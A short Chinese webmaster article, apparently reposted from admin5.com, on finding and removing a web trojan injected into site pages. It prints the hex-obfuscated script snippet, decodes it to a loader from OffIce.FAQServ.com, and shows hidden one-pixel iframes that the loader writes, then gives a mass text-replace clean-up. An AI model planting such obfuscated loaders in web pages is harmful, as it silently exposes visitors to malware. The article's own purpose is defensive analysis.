三原色参考文章:网页木马的查杀方法(网络安全)
木马代码实例:
“<script>document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x68\x74\x74\x70\x3A\x2F\x2F\x4F\x25\x36\x36\x25\x36\x36\x25\x34\x39\x25\x36\x33\x65\x25\x32\x45\x25\x34\x36\x25\x34\x31\x51\x25\x35\x33\x25\x36\x35\x25\x37\x32\x76\x2E\x25\x34\x33\x25\x36\x46\x25\x34\x44\x2F\x25\x34\x36\x25\x34\x31\x25\x35\x31\x25\x32\x45\x25\x36\x41\x25\x37\x33\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E");</script>”
最新的木马是十六进制的
把\x替换为%,然后用html代码转换功能,解码
<script src=http://O%66%66%49%63e%2E%46%41Q%53%65%72v.%43%6F%4D/%46%41%51%2E%6A%73></script>
在转换一次,解码
最终js 输出的是
<script src=http://OffIce.FAQServ.CoM/FAQ.js></script>
faq.js里面是
document.write('<iframe src="https://www.59.vc/page/add_54738542.htm" width="1" height="1" frameborder="1"></iframe>');
document.write('<iframe src="https://OffIce.FAQServ.com/FAQ.htm" width="1" height="2" frameborder="0"></iframe>');
https://OffIce.FAQServ.com/FAQ.htm
下载下来发现了这么一串代码:<script language="javascript" src="https://count18.51yes.com/click.aspxid=189404354&logo=1"></script>
木马的地址其中一个是51yes的
https://www.59.vc/page/add_54738542.htm"
下载下来发现了这么一串代码<script src=addr.js></script><script language="javascript" type="text/javascript" src="https://js.users.51.la/1542776.js"></script>
为了防止大家中毒把http改成了https
木马查杀暂时解决办法:
下载文本替换专家: http://sccrc.onlinedown.net/down/wfReplace26.rar
将网站中的代
<script>document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x68\x74\x74\x70\x3A\x2F\x2F\x4F\x25\x36\x36\x25\x36\x36\x25\x34\x39\x25\x36\x33\x65\x25\x32\x45\x25\x34\x36\x25\x34\x31\x51\x25\x35\x33\x25\x36\x35\x25\x37\x32\x76\x2E\x25\x34\x33\x25\x36\x46\x25\x34\x44\x2F\x25\x34\x36\x25\x34\x31\x25\x35\x31\x25\x32\x45\x25\x36\x41\x25\x37\x33\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E");</script>
换成空选择网站路径,替换,然后重新上专即可.
相关文章:一个菜鸟清除网站木马的经历
本文来自: 站长网(www.admin5.com) 详细出处参考:http://www.admin5.com/article/20080318/76524.shtml
